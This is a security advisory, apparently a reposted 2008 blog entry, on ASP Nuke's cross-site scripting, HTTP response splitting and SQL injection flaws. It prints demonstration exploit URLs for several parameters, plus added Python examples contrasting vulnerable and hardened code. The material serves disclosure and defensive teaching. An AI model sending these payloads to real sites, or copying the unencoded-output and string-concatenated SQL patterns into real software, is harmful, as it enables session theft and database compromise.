Friday, August 15, 2008

ASP Nuke Input Validation Holes Permit SQL Injection

Several vulnerabilities were reported in ASP Nuke. A remote user can conduct SQL injection, cross-site scripting, and HTTP response splitting attacks.

The 'forgot_password.asp' script does not properly validate user-supplied input in the 'email' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ASP Nuke software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. Cookies flagged HttpOnly cannot be read by script, but the injected code can still act as the user.

A demonstration exploit URL is provided. Once decoded, the payload begins with "> to close a double-quoted attribute value and its tag before the script element, which suggests the parameter is echoed back unencoded inside a form field:

http://[target]/module/account/register/forgot_password.asp?email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

The 'register.asp' script is also affected in several parameters, as shown in the following demonstration exploit URLs:

http://[target]/module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
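The following is an added example, not code from ASP Nuke or from the advisory. It takes the FirstName payload above, decodes it the way the server would, and shows what a browser makes of it when the value is echoed unencoded into a double-quoted attribute versus when it is HTML-encoded. The form markup, the host name target.example and the field layout are constructed stand-ins; the real register.asp template is not shown on the page.

```python
"""Added example, not ASP Nuke's code: how the page's FirstName payload behaves
when a parameter is echoed unencoded into a double-quoted HTML attribute, and
the same field with the value encoded. The form markup is a constructed
stand-in for register.asp; the real template is not shown on the page."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed request: the page's demonstration URL with a placeholder host.
DEMO_URL = ("http://target.example/module/account/register/register.asp"
            "?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E")


def first_name_from_url(url):
    """Return the decoded FirstName parameter, i.e. what Request("FirstName")
    would hand the script on the server."""
    return parse_qs(urlsplit(url).query)["FirstName"][0]


def vulnerable_field(value):
    """Redisplay the submitted value with no encoding (assumed behaviour of the
    affected script). The leading '">' in the payload closes the attribute and
    the tag, so the remainder is parsed as markup."""
    return '<input type="text" name="FirstName" value="' + value + '">'


def hardened_field(value):
    """Same field with the value encoded for an attribute context. quote=True
    turns '"' into &quot;, so the attribute cannot be closed early. Classic
    ASP's Server.HTMLEncode encodes & < > and '"' for the same purpose."""
    return ('<input type="text" name="FirstName" value="'
            + escape(value, quote=True) + '">')


class _TagCollector(HTMLParser):
    """Records the element names a browser-like parser would create."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def elements_seen_by_browser(markup):
    """Parse the markup and list the elements it produces."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    payload = first_name_from_url(DEMO_URL)
    print("decoded parameter:", payload)
    print("unencoded markup :", vulnerable_field(payload))
    print("  elements       :", elements_seen_by_browser(vulnerable_field(payload)))
    print("encoded markup   :", hardened_field(payload))
    print("  elements       :", elements_seen_by_browser(hardened_field(payload)))
```

The unencoded version yields an input element followed by a live script element; the encoded version yields only the input, with the payload visible as inert text in its value attribute.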

The 'language_select.asp' script does not properly validate user-supplied input in the 'LangCode' parameter. A remote user can submit a specially crafted URL to cause the target server to return a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.

A demonstration exploit URL is provided. The %0d%0a in the value is an encoded CR LF pair; it terminates the header into which the parameter is copied, so what follows (here a Set-Cookie header) is read by the client as a header of the server's choosing:

http://[target]/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue
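The following is an added example, not code from ASP Nuke or from the advisory. It decodes the LangCode payload above, copies it into a response header the way an unvalidated script would, and parses the result as a proxy or browser would, so the injected Set-Cookie shows up as a separate header. That language_select.asp stores the chosen code in a cookie is an assumption made for illustration; the response text, the host name target.example and the allow-list of language codes are constructed.

```python
"""Added example, not ASP Nuke's code: what the page's LangCode payload does to
an HTTP response when the parameter is copied into a header, and a hardened
version. That language_select.asp stores the chosen code in a cookie is an
assumption for illustration; the response below is constructed."""
from urllib.parse import parse_qs, urlsplit

# Constructed request: the page's demonstration URL with a placeholder host.
DEMO_URL = ("http://target.example/module/support/language/language_select.asp"
            "?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue")

# Assumed allow-list of language codes the application actually ships.
KNOWN_LANG_CODES = {"en", "de", "fr", "it"}


def lang_code_from_url(url):
    """Decoded LangCode parameter; %0d%0a becomes a real CR LF pair."""
    return parse_qs(urlsplit(url).query)["LangCode"][0]


def build_response(lang_code):
    """Assemble a raw response that remembers the language in a cookie."""
    return ("HTTP/1.1 200 OK\r\n"
            "Content-Type: text/html\r\n"
            "Set-Cookie: LangCode=" + lang_code + "\r\n"
            "\r\n"
            "<html><body>language set</body></html>")


def vulnerable_response(lang_code):
    """Copies the raw parameter into the header (assumed affected behaviour)."""
    return build_response(lang_code)


def hardened_response(lang_code):
    """Reject CR/LF outright, then require a known code. Either check alone
    stops this payload; the allow-list also blocks other header tricks."""
    if "\r" in lang_code or "\n" in lang_code:
        raise ValueError("CR or LF in header value")
    if lang_code not in KNOWN_LANG_CODES:
        raise ValueError("unknown language code")
    return build_response(lang_code)


def parse_response(raw):
    """Split a raw response into (status line, [(name, value), ...], body),
    the way a proxy or browser reads it: headers end at the first blank line."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def set_cookie_headers(raw):
    """Every Set-Cookie header the client would honour."""
    _, headers, _ = parse_response(raw)
    return [value for name, value in headers if name.lower() == "set-cookie"]


if __name__ == "__main__":
    code = lang_code_from_url(DEMO_URL)
    print("decoded parameter:", repr(code))
    print("cookies set by the split response:", set_cookie_headers(vulnerable_response(code)))
    try:
        hardened_response(code)
    except ValueError as err:
        print("hardened version rejected it:", err)
```

The client sees two Set-Cookie headers, one written by the application and one written by the attacker. A payload carrying %0d%0a%0d%0a followed by its own body would end the header block entirely and let the attacker supply the whole response, which is what makes cache poisoning possible.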

The 'comment_post.asp' script does not properly validate user-supplied input in the 'TaskID' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.
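The following is an added example, not code from ASP Nuke or from the advisory, which gives no demonstration payload for this issue. It shows a numeric lookup parameter concatenated into a query, the common classic-ASP pattern, beside the same query with the value validated and bound as a parameter. SQLite is a stand-in for the application's database; the Task table, its rows and the '1 OR 1=1' payload are constructed for illustration.

```python
"""Added example, not ASP Nuke's code: a numeric lookup parameter concatenated
into SQL versus the same query parameterised. SQLite is a stand-in for the
application's database, the Task table and rows are constructed, and
'1 OR 1=1' is an illustrative payload, not one taken from the advisory."""
import sqlite3


def make_db():
    """Constructed in-memory database with one table of tasks."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Task (TaskID INTEGER PRIMARY KEY, Title TEXT, OwnerID INTEGER)")
    conn.executemany("INSERT INTO Task VALUES (?, ?, ?)", [
        (1, "Public task", 10),
        (2, "Private task", 20),
        (3, "Other private task", 30),
    ])
    return conn


def vulnerable_task_lookup(conn, task_id):
    """Builds the statement by string concatenation, the usual classic-ASP
    pattern ("... WHERE TaskID = " & Request("TaskID")). Whatever is in
    task_id becomes part of the SQL, so the WHERE clause is attacker-controlled."""
    sql = "SELECT TaskID, Title FROM Task WHERE TaskID = " + task_id
    return conn.execute(sql).fetchall()


def hardened_task_lookup(conn, task_id):
    """Validates the type, then binds the value as a parameter so it can only
    ever be a number. In classic ASP the equivalent is an ADODB.Command with
    a Parameters collection rather than a concatenated string."""
    try:
        number = int(task_id)
    except ValueError:
        raise ValueError("TaskID must be an integer")
    return conn.execute(
        "SELECT TaskID, Title FROM Task WHERE TaskID = ?", (number,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("normal request     :", vulnerable_task_lookup(db, "2"))
    print("injected '1 OR 1=1':", vulnerable_task_lookup(db, "1 OR 1=1"))
    print("hardened, normal   :", hardened_task_lookup(db, "2"))
    try:
        hardened_task_lookup(db, "1 OR 1=1")
    except ValueError as err:
        print("hardened, injected : rejected,", err)
```

With concatenation the payload collapses the WHERE clause and returns every row; with validation and binding the same input is rejected before it reaches the database.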

The vendor has been notified.

Alberto Trivero reported this vulnerability.

Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ASP Nuke software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.

A remote user may be able to poison any intermediate web caches with arbitrary content.
